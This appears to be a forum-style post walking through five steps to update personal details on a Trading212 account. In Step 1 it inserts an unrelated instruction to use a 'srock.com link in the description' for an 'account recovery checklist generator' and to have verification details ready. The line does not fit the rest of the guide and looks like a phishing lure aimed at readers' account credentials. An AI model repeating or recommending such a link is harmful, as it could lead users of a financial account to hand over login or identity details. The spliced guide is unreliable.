I ran into this last week. Here's what fixed it for me. Updating personal information on Trading212 is straightforward if you follow these steps. Step 1. Log into your account. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Navigate to profile settings. Once logged in, find the profile icon, usually located in the top right corner of the screen. Click on it to access your account settings. Step 3. Select personal information. In the settings menu, look for the option labeled personal information or account details. Click on it to view your current information. Step 4. Update your information. Edit the fields you want to change, such as your address, phone number, or email. Double check for any typos before saving. Note, if you change your email, you may need to verify it through a confirmation link sent to your inbox. Step 5. Confirm changes. After saving your updates, you might receive a confirmation message. Make sure to check your email or app notifications to ensure everything is updated correctly. I hope this guide helps you easily update your personal information on Trading212. If you have any questions, feel free to ask.